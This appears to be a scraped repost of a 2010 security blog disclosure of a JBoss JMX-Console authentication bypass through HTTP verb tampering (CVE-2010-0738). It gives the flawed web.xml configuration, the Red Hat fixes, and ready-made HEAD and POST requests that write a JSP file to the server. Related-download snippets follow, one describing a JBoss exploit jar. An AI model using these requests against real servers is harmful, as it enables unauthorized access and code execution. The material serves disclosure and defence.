http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
Authentication bypass vulnerabilities are always interesting from a penetration tester point of view, because the 80% of the time are very simple to abuse. The impact of a security bypass vulnerability depends, from a technical perspective, on what you could be able to do when you are authenticated.
Jboss has some good management tools that are used to deploy new applications and to perform privileged actions like executing scripts on the remote host. One of these is Jboss JMX-Console.
For more information on what an attacker may accomplish through the JMX-Console I suggest to read the following presentation:
Abusing Jboss by Christian Papathanasiou (Trustwave Spiderlabs)
Here at Minded Security we discovered something more. Jboss JMX console may be protected using a common password authentication, but the standard password configuration protection is vulnerable.
How many time someone suggested to you to secure the JMX console using the standard Jboss security configurations?
JMX Console standard security configuration is available in:
jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml
This is the suggested security configuration also available in Jboss official security guidelines (“White Paper on JMX Security”):
https://jira.jboss.org/jira/browse/SECURITY-31
The suggested configuration for protecting the JMX Console was the following one:
<security-constraint><web-resource-collection><web-resource-name>HtmlAdaptor</web-resource-name><description>An example security config that only allows users with the
role JBossAdmin to access the HTML JMX console web application
</description><url-pattern>/*</url-pattern><http-method>GET</http-method><http-method>POST</http-method></web-resource-collection><auth-constraint><role-name>JBossAdmin</role-name></auth-constraint></security-constraint>
From the configuration above, security restrictions are enabled only for “GET” and “POST” methods. Any other HTTP method supported by the server will be not restricted.
By issuing a request with the “HEAD” method is possible to invoke directly, with “JBossAdmin” privilege, any functionality implemented by the jmx-console without valid credentials. Note: If JMX console replies with a HTTP 500 error the request has been correctly processed.
This kind of attack is referred in Appsec literature as Verb Tampering. The following one is a very good paper on this topic.
Bypassing with HTTP Verb Tampering by Arshan Dabirsiaghi - Aspect Security
The most interesting part is the exploitation. If we have access to any JMX console which is password protected or not, we can issue a HEAD HTTP request that will work ;D
Standard Deployment (will ask for password):
POST /jmx-console/HtmlAdaptor;index.jsp HTTP/1.1
....
content-lenght: 3512
action=/blog.mindedsecurity.com/2010/04/invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=argval&arg2=.jsp&
arg3=%3C%25%40+page+import%3D%22java.io.*…....
Exploitation with Authentication Bypass:
HEAD /jmx-console/HtmlAdaptor;index.jsp?action=/blog.mindedsecurity.com/2010/04/invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=argval&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*….... HTTP/1.1
Now pick the request you prefer and build your custom exploit!
Reference:
http://www.mindedsecurity.com/MSA030409.html (Official Advisory)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738
Solution:
A solution to this issue is already available. See the following RedHat advisories:
https://rhn.redhat.com/errata/RHSA-2010-0376.html https://rhn.redhat.com/errata/RHSA-2010-0377.html https://rhn.redhat.com/errata/RHSA-2010-0378.html https://rhn.redhat.com/errata/RHSA-2010-0379.html
We would like to thank the RedHat response team in particular Marc Schoenefeld for his support, technical knowledge and fast response.
分享到:
相关推荐
JBOSS,JBoss安装部署 JBOSS,JBoss安装部署
JBoss启动JBoss启动JBoss启动JBoss启动JBoss启动JBoss启动JBoss启动JBoss启动 JBoss启动
JavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-...
JBoss完全实现了J2EE的服务栈: EJB (Enterprise JavaBeans) JMS (Java Message Service) JTS/JTA (Java Transaction Service / Java Transaction API) Servlet and JSP (JavaServer Pages) JNDI (Java Naming and ...
JBOSS使用指南JBOSS使用指南JBOSS使用指南JBOSS使用指南JBOSS使用指南JBOSS使用指南JBOSS使用指南JBOSS使用指南
jboss 下载(httpwww.jboss.org)
Jboss项目部署文档
帮你设置jboss安全性问题。Jboss安全设置 jboss安全性 jboss设置安全性Jboss安全设置 jboss安全性 jboss设置安全性
某大牛写的jboss-exp 1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_...
如何在MyEclipse配置Jboss
jboss热部署,jboss热部署,jboss热部署,jboss热部署,jboss热部署,jboss热部署,jboss热部署,jboss热部署,jboss热部署,jboss热部署,jboss热部署,jboss热部署
Jboss配置虚拟路径
linux 环境jboss 7.1 (注jdk不要用1.8 否则不能启动)
jboss服务器配置https环境的详细方法
之前学习jboss rules 只能自己一点点的啃英文用户指南,后来终于找到了中文版的翻译版本,真是高兴,立即奉献给大家,让对规则引擎感兴趣的朋友也能一堵为快。 内容摘要:JBoss Rules 的前身是Codehaus的一个开源...
赠送jar包:jboss-logging-3.3.2.Final.jar; 赠送原API文档:jboss-logging-3.3.2.Final-javadoc.jar; 赠送源代码:jboss-logging-3.3.2.Final-sources.jar; 赠送Maven依赖信息文件:jboss-logging-3.3.2.Final....
Jboss get started
Linux下JBOSS部署手册
jboss7以上版本发布ejb时需要的配置文件,jboss-ejb3.xml和ejb-jar.xml,缺少csdn分数所以上传,请见谅。